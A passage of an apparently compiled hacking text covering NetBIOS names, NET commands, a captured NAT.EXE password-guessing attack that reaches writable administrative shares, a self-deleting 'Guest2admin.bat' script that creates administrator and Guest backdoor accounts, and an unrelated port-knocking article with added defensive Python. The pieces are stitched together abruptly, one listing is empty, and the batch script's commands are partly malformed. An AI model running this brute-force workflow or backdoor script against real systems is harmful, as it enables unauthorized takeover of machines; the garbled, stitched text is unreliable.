<computername>        31      U     Modem Sharing Client Service
<computername>        43      U     SMS Client Remote Control
<computername>        44      U     SMS Admin Remote Control Tool
<computername>        45      U     SMS Client Remote Chat
<computername>        46      U     SMS Client Remote Transfer
<computername>        4C      U     DEC Pathworks TCPIP Service
<computername>        52      U     DEC Pathworks TCPIP Service
<computername>        87      U     Exchange MTA
<computername>        6A      U     Exchange IMC
<computername>        BE      U     Network Monitor Agent
<computername>        BF      U     Network Monitor Apps
<username>            03      U     Messenger Service
<domain>              00      G     Domain Name
<domain>              1B      U     Domain Master Browser
<domain>              1C      G     Domain Controllers
<domain>              1D      U     Master Browser
<domain>              1E      G     Browser Service Elections
<INet~Services>       1C      G     Internet Information Server
<IS~computername>     00      U     Internet Information Server
<computername>        2B      U     Lotus Notes Server
Forte_$ND800ZA        20      U     DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.

Group (G): A normal group; the single name may exist with many IP addresses.

Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.

Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.

Domain Name (D): New in NT 4.0

For a quick and dirty look at a server's registered NetBIOS names and services, issue the following NBTSTAT command:

nbtstat -A [ipaddress]
nbtstat -a [host]

NetBIOS Sessions

The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands transfer the data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.

NetBIOS Datagrams

Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.

The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.

NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, NetBIOS has been paired with a network protocol called NetBEUI (NetBIOS Extended User Interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.

Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name-to-address resolution by using either broadcasts or LMHOSTS files. In a Microsoft environment, you would probably also use a NetBIOS Name Server known as WINS.

NetBEUI Explained

NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. It is the transport layer driver frequently used by Microsoft's LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LAN Manager server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher-level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.

NetBIOS Scopes

A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer name as long as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.


NetBIOS Attack Methods

This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, and Windows 98 beta 2.1. One of the components being used is NAT.EXE. A discussion of the tool, its switches, and common techniques follows:

NAT.EXE [-o filename] [-u userlist] [-p passlist]

-o Specify the output file. All results from the scan will be written to the specified file, in addition to standard output.
-u Specify the file to read usernames from. Usernames will be read from the specified file when attempting to guess the password on the remote server. Usernames should appear one per line in the specified file.
-p Specify the file to read passwords from. Passwords will be read from the specified file when attempting to guess the password on the remote server. Passwords should appear one per line in the specified file.

Addresses should be specified in comma delimited format, with no spaces. Valid address specifications include:
hostname - "hostname" is added, adds addresses
through, adds addresses through,7,10-20, adds addresses
through,, through
hostname,, adds "hostname" and
All combinations of hostnames and address ranges as specified above are valid.

[8.0.1] Comparing NAT.EXE to Microsoft's own executables

[8.0.2] First, a look at NBTSTAT

First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non-Microsoft tools.

What follows is pretty much a step-by-step guide to using NBTSTAT as well as extra information. Again, if you're interested in more NBTSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.

C:\>nbtstat -A XXX.XX.XXX.XX

NetBIOS Remote Machine Name Table

Name Type Status
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial listing of NetBIOS 16th-character suffixes:

Computername <00> UNIQUE  Workstation Service name
Domainname   <00> GROUP   Domain name
Server       <20> UNIQUE  Server Service name

Computername <03> UNIQUE  Registered by the Messenger service. This is the computer name to be added to the LMHOSTS file, which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood.
Username     <03>         Registered by the Messenger service.
Domainname   <1B>         Registers the local computer as the master browser for the domain.
Domainname   <1C>         Registers the computer as a domain controller for the domain (PDC or BDC).
Domainname   <1D>         Registers the local client as the local segment's master browser for the domain.
Domainname   <1E>         Registers as a Group NetBIOS Name.
Network Monitor Name
Network Monitor Agent
             <06>         RAS Server
             <1F>         Net DDE
             <21>         RAS Client
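The nbtstat capture above and the two suffix tables can be turned into an inventory check that an auditor runs against their own hosts: parse the remote name table, decode each 16th-character suffix, and state what the table discloses to anyone who can reach UDP/137 (computer name, domain, whether file sharing and domain controller roles are advertised). This is an added example and not code from the original page or the rhino9 paper; SUFFIXES is a subset of the Microsoft table listed earlier, and SAMPLE_OUTPUT is constructed from the STUDENT1/DOMAIN1 capture shown above.

```python
"""Decode an `nbtstat -A <ip>` remote name table into service roles.

Added example; not part of the original page or the rhino9 paper it quotes.
SUFFIXES is a subset of the Microsoft suffix table listed above, and
SAMPLE_OUTPUT is constructed from the STUDENT1/DOMAIN1 capture shown above.
"""
import re
from collections import namedtuple

Entry = namedtuple("Entry", "name suffix ntype status usage")

# (16th-character suffix, type) -> service; U = unique name, G = group name.
SUFFIXES = {
    (0x00, "U"): "Workstation Service",
    (0x00, "G"): "Domain Name",
    (0x01, "G"): "Master Browser",
    (0x03, "U"): "Messenger Service",
    (0x06, "U"): "RAS Server Service",
    (0x1B, "U"): "Domain Master Browser",
    (0x1C, "G"): "Domain Controllers",
    (0x1D, "U"): "Master Browser",
    (0x1E, "G"): "Browser Service Elections",
    (0x1F, "U"): "NetDDE Service",
    (0x20, "U"): "File Server Service",
    (0x21, "U"): "RAS Client Service",
    (0xBE, "U"): "Network Monitor Agent",
    (0xBF, "U"): "Network Monitor Apps",
}

# One table row: NAME <hh> UNIQUE|GROUP Registered. The browser entry
# "..__MSBROWSE__.<01>" has no blank before "<", hence the lazy \S+?.
ROW = re.compile(r"^\s*(\S+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


def parse_nbtstat(text):
    """Return (entries, mac) parsed from one nbtstat -A output block."""
    entries, mac = [], None
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            name, hexsuf, ntype, status = m.groups()
            suffix, t = int(hexsuf, 16), ntype[0]          # UNIQUE -> U, GROUP -> G
            usage = SUFFIXES.get((suffix, t), "unknown suffix")
            entries.append(Entry(name.strip("."), suffix, t, status, usage))
            continue
        mm = MAC.search(line)
        if mm:
            mac = mm.group(1)
    return entries, mac


def summarize(entries):
    """What the name table tells anyone who can reach UDP/137 on this host."""
    def first(suffix, t):
        return next((e.name for e in entries if (e.suffix, e.ntype) == (suffix, t)), None)

    computer = first(0x00, "U")
    roles = {e.usage for e in entries}
    return {
        "computer": computer,
        "domain": first(0x00, "G"),
        "file_sharing": "File Server Service" in roles,            # <20>: shares reachable over NBT
        "domain_controller": "Domain Controllers" in roles,         # <1C>
        "domain_master_browser": "Domain Master Browser" in roles,  # <1B>, normally the PDC
        # <03> names other than the computer name are logged-on users (Messenger service)
        "logged_on_users": sorted({e.name for e in entries if e.suffix == 0x03 and e.name != computer}),
        "unknown_suffixes": sorted({e.suffix for e in entries if e.usage == "unknown suffix"}),
    }


# Constructed from the capture above; the MAC is the one printed there.
SAMPLE_OUTPUT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
STUDENT1       <20>  UNIQUE      Registered
STUDENT1       <00>  UNIQUE      Registered
DOMAIN1        <00>  GROUP       Registered
DOMAIN1        <1C>  GROUP       Registered
DOMAIN1        <1B>  UNIQUE      Registered
STUDENT1       <03>  UNIQUE      Registered
DOMAIN1        <1E>  GROUP       Registered
DOMAIN1        <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-C0-4F-C4-8C-9D
"""

if __name__ == "__main__":
    entries, mac = parse_nbtstat(SAMPLE_OUTPUT)
    for e in entries:
        print(f"{e.name:16} <{e.suffix:02X}> {e.ntype}  {e.usage}")
    print("MAC:", mac)
    print(summarize(entries))
```

Running it on the sample shows that the table alone reveals the host is a domain controller (<1C>), the domain master browser (<1B>) and a file server (<20>) for DOMAIN1; a host that should not be answering name queries from untrusted networks is one on which UDP/137 ought to be filtered.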

[8.0.3] Intro to the NET commands

The NET command is a command that admins can execute through a DOS window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline of a NET command batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options comes first:

[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.

[8.0.5] Net Computer: This adds or deletes computers from a domain's database.

[8.0.6] Net Config Server or Net Config Workstation: Displays configuration information about the Server or Workstation service. When used without specifying Server or Workstation, the command displays a list of configurable services.

[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.

[8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.

[8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.

[8.1.0] Net Help: Displays help for these commands.

[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.

[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.

[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.

[8.1.4] Net Pause: Use this command to suspend a certain NT service.

[8.1.5] Net Print: Displays print jobs and shared queues.

[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.

[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.

[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.

[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.

[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Be aware that stopping one service may stop other services as well.

[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.

[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.

[8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating and modifying those accounts.

[8.2.4] Net View: This command displays a list of resources being shared on a computer, including NetWare servers.

[8.2.5] Special note on DOS and older Windows machines: The commands listed above are available on Windows NT Server and Workstation; DOS and older Windows clients have these NET commands available:

Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View

The commands used in this section are NET VIEW and NET USE.

[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.

C:\>net view XXX.XX.XXX.XX

Shared resources at XXX.XX.XXX.XX

Share name   Type   Used as   Comment

NETLOGON     Disk             Logon server share
Test         Disk
The command completed successfully.

NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.

C:\>net use /?

The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]

NET USE [devicename | *] [password | *]] [/HOME]


C:\>net use x: \\XXX.XX.XXX.XX\test

The command completed successfully.

C:\unzipped\nat10bin>net use

New connections will be remembered.

Status       Local     Remote                    Network

OK           X:        \\XXX.XX.XXX.XX\test      Microsoft Windows Network
OK                     \\XXX.XX.XXX.XX\test      Microsoft Windows Network

The command completed successfully.

Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.

C:\>nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt

[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'

[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:

[*]--- This machine has a browse list:

Server Comment
--------- -------

[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$

[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$

[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON

[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test

[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the default share of Everyone/Full Control is active, then you are done: the server is hacked. If not, keep playing. You will be surprised what you find out.



echo off
title Please wait...
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Save the file as "Guest2admin.bat".
Then you can double-click the file to execute it, or run it from cmd.
It works...



Port Knocking

Port knocking is a clever new computer security trick. It's a way to configure a system so that only systems that know the "secret knock" can access a certain port. For example, you could build a port-knocking defensive system that would not accept any SSH connections (port 22) unless it detected connection attempts to closed ports 1026, 1027, 1029, 1034, 1026, 1044, and 1035 in that sequence within five seconds, then listened on port 22 for a connection within ten seconds. Otherwise, the system would completely ignore port 22.

It's a clever idea, and one that could easily be built into VPN systems and the like. Network administrators could create unique knocks for their networks -- family keys, really -- and only give them to authorized users. It's no substitute for good access control, but it's a nice addition. And it's an addition that's invisible to those who don't know about it.

Firewall administrators are challenged to balance flexibility and security when designing a comprehensive rule set. A firewall should provide protection against malfeasants, while allowing trusted users to connect. Unfortunately, it is not always possible to filter out the bad guys, because filtering on the basis of IP addresses and ports does not distinguish connecting users. Bad guys can and do come from trusted IP addresses. Open ports remain a necessary vulnerability: they allow connections to applications but also may turn into open doors for attack. This article presents a new security system, termed port knocking, in which trusted users manipulate firewall rules by transmitting information across closed ports.

Briefly, users make connection attempts to sequences of closed ports. The failed connections are logged by the server-side packet filtering firewall and detected by a dæmon that monitors the firewall log file. When a properly formatted knock sequence, playing the role of the secret used in the authentication, is received, firewall rules are manipulated based on the information content of the sequence. This user-based authentication system is both robust, being mediated by the kernel firewall, and stealthy--it's not possible to detect whether a networked machine is listening for port knocks. Port knocking does not require any open ports, and it can be extended to transmit any type of information encoded in a port sequence.

In commonly deployed firewalls, filtering is done either by the IP address of the connecting host or by the port to which this host is connecting. Firewalls examine and interact with packets before any user authentication takes place; therefore, they do not discriminate amongst the users making the connection. It is expected that once the firewall has approved the packet and allowed it to enter the network, downstream applications will handle user authentication. Normally, this provides a sufficient balance between protection and flexibility. Some IP ranges, say cracker-friendly Internet cafés, may be closed completely to incoming traffic, while hosts in other IP ranges may be allowed to connect to ports otherwise unavailable to the general public (proprietary/sensitive applications). Unfortunately, this type of IP-based filtering has the potential to lock out trusted users from your system. Flexibility is limited by the fact that nobody from the blocked IP ranges can connect, regardless of their trust status. At the same time, protection is undermined by the fact that anyone from the blocked IP range physically can travel and connect from an unfiltered host. In the end, as long as ports remain open, network applications are susceptible to attack. Using intrusion detection systems and keeping applications up to date can go a long way towards providing protection, but they do so against only known, derivative or anticipated attacks. To eliminate the risk associated with publicly open ports, port knocking provides an authentication system that works across closed ports. The use of these ports, however, has to be subverted because all packets are denied. Fortunately, in most firewalls that perform even the most rudimentary logging, information already is flowing across closed ports in the form of entries in a log file indicating connection attempts. Consider the following example.

A handful of ports (100-109) are configured to deny all traffic--no ICMP error packets are sent back to the connecting client--and all attempted connections are logged. In this example, the firewall IP is IPF and the connecting client IP is IPC. The appropriate ipchains command to close the ports and log connections is:

ipchains -A input -p tcp -s 0/0 -d IPF/32 100:109 -j DENY -l

A user attempts to connect from IPC to the following firewall ports in sequence: 102,100,100,103. From the point of view of the user, the connections fail silently. On the firewall, though, the 102,100,100,103 number sequence has been recorded:

Feb 12 00:13:26 ... input DENY eth1 PROTO=6 IPC:64137 IPF:102 ...
Feb 12 00:13:27 ... input DENY eth1 PROTO=6 IPC:64138 IPF:100 ...
Feb 12 00:13:27 ... input DENY eth1 PROTO=6 IPC:64139 IPF:100 ...
Feb 12 00:13:28 ... input DENY eth1 PROTO=6 IPC:64140 IPF:103 ...

The knock sequence appears in the firewall log, and the user has transmitted data across the closed ports. Any implementation of the port knocking system needs to provide some basic functionality. First, some way to monitor the firewall log file needs to be devised. A simple Perl application that tails the file is presented in Listing 2, discussed more fully later in the article. Second, a method is required to extract the sequences of ports from the log file and translate their payload into usable information. In this step it is important to be able to (a) detect when a port sequence begins and ends, (b) correctly detect a port sequence in the presence of spurious connection attempts that are not part of the sequence and (c) keep track of multiple port sequences arriving at the same time from different remote IPs. The encoding used to generate the port sequence can be designed to minimize the length of the sequence. For example, the sequence 100,102 could correspond to one or a series of predefined operations (for example, open port ssh/22 for 15 minutes for a specific IP and then close the port). Finally, once the information is derived from the sequence, the implementation must provide some way to manipulate the firewall rules.
Benefits of Port Knocking
One of the key features of port knocking is it provides a stealthy method of authentication and information transfer to a networked machine that has no open ports. It is not possible to determine successfully whether the machine is listening for knock sequences by using port probes. Thus, although a brute-force attack could be mounted to try to guess the ports and the form of the sequence, such breach attempts could be detected easily. Second, because information is flowing in the form of connection attempts rather than in typical packet data payload, without knowing that this system is in place it would be unlikely that the use of this authentication method would be detected by monitoring traffic. To minimize the risk of a functional sequence being constructed by the intercepting party, the information content containing the remote IP of the sequence can be encrypted. Third, because the authentication is built into the port knock sequence, existing applications need not be changed. Implementing one-time passwords is done easily by adjusting the way particular sequences are interpreted. A sequence could correspond to a request that a port be opened for a specific length of time and then closed and never opened again to the same IP. Furthermore, a one-time pad could be used to encrypt the sequence, making it indecipherable by those without the pad.
Disadvantages of Port Knocking
To use port knocking, a client script that performs the knock is required. The client and any associated data should be considered a secret and kept on removable media, such as a USB key. The use of the client imposes an overhead for each connection. Certain locations, such as libraries or Internet cafés, may not allow execution of arbitrary programs. In order to use port knocking, a number of ports need to be allocated for exclusive use by this system. As the number of such ports increases, the knock sequences become shorter for a given amount of information payload, because the number of coding symbols is increased. Practically, 256 free privileged ports (in the 1-1024 range), not necessarily contiguous, usually can be allocated and used to listen for port knocks. Finally, any system that manipulates firewall rules in an automated fashion requires careful implementation. For the scenario in which no ports are initially open, if the listening dæmon fails or is not able to interpret the knocks correctly, it becomes impossible to connect remotely to the host.
In this section, three examples are outlined that illustrate how the port knocking system can be used.

1. Single Port, Fixed Mapping

Connection to only one port (ssh/22) is required. The ssh dæmon is running; all privileged ports are closed, including ssh/22; and packets addressed to ports 30,31,32 are being logged. The following port sequences are recognized:

31,32,30  open ssh/22 to connecting IP
32,30,31  close ssh/22 to connecting IP
31,30,32  close ssh/22 to connecting IP and disregard further knocks from this IP

The justifiably paranoid administrator can open the ssh/22 port on his system by initiating TCP connections to ports 31,32,30. At the end of the ssh session, the port would be closed by using the second sequence shown above. If the host from which the administrator is connecting is not trusted (if, say, keystrokes may be snooped), the use of the third sequence would deny all further traffic from the IP, preventing anyone from duplicating the session. This assumes the port sequence and system login credentials are not captured by a third party and used before the legitimate session ends. In this example, only three sequences are understood by the system, as the requirements call for only a handful of well-defined firewall manipulations. The sequences were chosen not to be monotonically increasing (30, 31, 32), so they would not be triggered by remote port scans. If multiple ports are to be protected by this system, a mapping needs to be derived between the port sequence and a flexible firewall rule. This is covered in the next example.

2. Multiple Port, Dynamic Mapping

In this example, a network may be running any number of applications. Ports 100-109 are used to listen to knocks. The port sequence is expected to be of the form:

102,100,110   10a,10b,10c,10d   10(a+b+c+d mod 10)   110,100,102
header        payload           checksum             footer

The first and last three ports let the port knocking dæmon know that a sequence is starting and ending. The next four ports encode the port (abcd) to be opened. For example, if a connection to port 143 is required, the sequence would be 100,101,104,103. The final element in the sequence is a checksum that validates the sequence payload. In this example, the checksum is 8 (1+4+3 mod 10). The sequence element therefore is 108, and the full sequence would be:

102,100,103   100,101,104,103   108   103,100,102

When this sequence is detected, port 143 would be made available to the incoming IP address. If the port is open already, the knock would render it closed. The knock can be extended to include additional information, such as an anticipated session length, that can be used to close the port after a set amount of time.

3. Mapping with Encryption

The information contained in the knock sequence can be encrypted to provide an additional measure of security. In this example, 256 ports are allocated and logged. A knock map of the form

remote IP   port   time   checksum

is used, where the remote IP, port, time and checksum (sum of other fields mod 255) are encrypted. The encrypted string can be mapped onto eight unsigned chars using Perl's pack("C*",STRING) command, see Listing 1.

Listing 1. Mapping the Encrypted String
A minimal prototype Perl implementation of port knocking is presented. The implementation consists of a knockclient, responsible for originating the knock sequence, and a knockdæmon, responsible for monitoring the firewall log and manipulating the rules.

The complete client is shown in Listing 1. Lincoln Stein's Crypt::CBC module is used as a proxy to Crypt::Blowfish to carry out encryption. The unencrypted knock sequence consists of seven values: four IP bytes, a port (limited to the range 0-255 in this implementation), a time flag and a checksum (mod 255). The time flag determines how the dæmon reacts: 0 to open the port, 255 to close the port and any other value in the 1-254 range to open the port and then close it after that many minutes. The knock on the firewall (IP=IPF) to open port ssh/22 on IP=IPC and then have the port close after 15 minutes would be executed by calling the client as follows:

knockclient -i IPC -r IPF -p 22 -t 15

The client packs the list of seven integers, performs the encryption and unpacks the string into unsigned chars (0-255). These values are then mapped onto a sequence of ports in the 745-1000 range.

The knockdæmon is shown in Listing 2. This application uses File::Tail to look for new lines in the firewall log file. Lines corresponding to connection attempts to ports 745-1000 are parsed for the remote IP and port number. An 8-element queue storing the ports is maintained for each incoming IP. When the queue size reaches 8, its contents are decrypted. If the decryption is successful and the checksum is correct, appropriate action is taken and the queue is cleared. If the decryption fails, the oldest queue port element is removed and the dæmon continues monitoring.

Listing 2. knockdæmon

The firewall rules are manipulated by a system call to the ipchains binary, although the IPChains Perl module by Jonathan Schatz also may be used. If the port is to be closed, as indicated by the time flag, Jose Rodrigues' Schedule::At module is used to schedule the deletion of the rule using the at queue system.
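The dæmon side of the "multiple port, dynamic mapping" scheme (example 2 above) together with the per-IP queue approach just described can be put in a single detector that reads the ipchains log lines. The following is an added example and not the article's Perl knockdæmon. It assumes the header/footer from the article's worked sequence, 102,100,103 and 103,100,102, because those are the ones that fall inside the logged 100-109 range (the article states 102,100,110 and 110,100,102 in one place and the former in the worked sequence). The log lines are constructed in the ipchains format quoted earlier, with the IPC/IPF placeholders replaced by made-up addresses, and the detector returns the decoded action rather than calling ipchains so it runs offline. It covers the three requirements listed earlier: it finds where a sequence starts and ends (header/footer), it ignores connection attempts outside the knock range and slides past noise inside it, and it keeps one queue per remote IP.

```python
"""Server-side knock detector over ipchains DENY log lines.

Added example, not the article's Perl knockdæmon. Implements the dynamic
mapping above: header, four payload ports encoding the digits of a port,
a checksum port 10(a+b+c+d mod 10), footer, all in the 100-109 range.
HEADER/FOOTER are assumed from the article's worked sequence; LOG is
constructed (10.0.0.x as the client, 192.0.2.1 as the firewall).
"""
import re
from collections import defaultdict, deque

KNOCK_PORTS = range(100, 110)            # closed and logged ports
HEADER = (102, 100, 103)                 # assumed, see module docstring
FOOTER = (103, 100, 102)
SEQ_LEN = len(HEADER) + 4 + 1 + len(FOOTER)   # 11 knocks per sequence

# ipchains -l line fragment: "input DENY eth1 PROTO=6 SRC:SPORT DST:DPORT"
LINE = re.compile(r"input DENY \S+ PROTO=6 (\d+\.\d+\.\d+\.\d+):\d+ \d+\.\d+\.\d+\.\d+:(\d+)")


def decode(seq):
    """Validate one SEQ_LEN-port window; return the target port or None."""
    seq = tuple(seq)
    if len(seq) != SEQ_LEN or seq[:3] != HEADER or seq[-3:] != FOOTER:
        return None
    digits = [p - 100 for p in seq[3:7]]               # 10a,10b,10c,10d -> a,b,c,d
    if any(not 0 <= d <= 9 for d in digits):
        return None
    if seq[7] != 100 + sum(digits) % 10:                # checksum port
        return None
    port = int("".join(map(str, digits)))
    return port if 1 <= port <= 65535 else None


class KnockDetector:
    """One sliding window of knock-range ports per remote IP."""

    def __init__(self):
        self.queues = defaultdict(lambda: deque(maxlen=SEQ_LEN))
        self.open_ports = defaultdict(set)              # ip -> ports currently opened

    def feed(self, line):
        """Consume one log line; return (ip, action, port) or None."""
        m = LINE.search(line)
        if not m:
            return None
        ip, dport = m.group(1), int(m.group(2))
        if dport not in KNOCK_PORTS:
            return None                                  # attempt on some other closed port
        q = self.queues[ip]
        q.append(dport)                                  # deque drops the oldest knock itself
        if len(q) < SEQ_LEN:
            return None
        port = decode(q)
        if port is None:
            return None                                  # not a valid knock yet; keep sliding
        q.clear()
        if port in self.open_ports[ip]:                  # second knock toggles the port closed
            self.open_ports[ip].discard(port)
            return (ip, "close", port)
        self.open_ports[ip].add(port)
        return (ip, "open", port)


def run(log_lines):
    """Feed all lines through one detector and return the actions it derived."""
    det = KnockDetector()
    return [a for a in map(det.feed, log_lines) if a]


def _line(src, sport, dport, ts="Feb 12 00:13:26"):
    """Constructed ipchains log line in the format quoted in the article."""
    return (f"{ts} fw kernel: Packet log: input DENY eth1 PROTO=6 "
            f"{src}:{sport} 192.0.2.1:{dport} L=60 S=0x00 I=0 F=0x4000 T=64 SYN (#3)")


# 10.0.0.5 knocks for port 143 with one stray attempt on port 22 in the middle;
# 10.0.0.9 port-scans 100-109 in order and must not trigger anything.
KNOCK_143 = [102, 100, 103, 100, 101, 104, 103, 108, 103, 100, 102]
LOG = [_line("10.0.0.5", 64137 + i, p) for i, p in enumerate(KNOCK_143[:5])]
LOG.append(_line("10.0.0.5", 64200, 22))
LOG += [_line("10.0.0.5", 64142 + i, p) for i, p in enumerate(KNOCK_143[5:])]
LOG += [_line("10.0.0.9", 40000 + i, p) for i, p in enumerate(range(100, 110))]

if __name__ == "__main__":
    for action in run(LOG):
        print(action)
```

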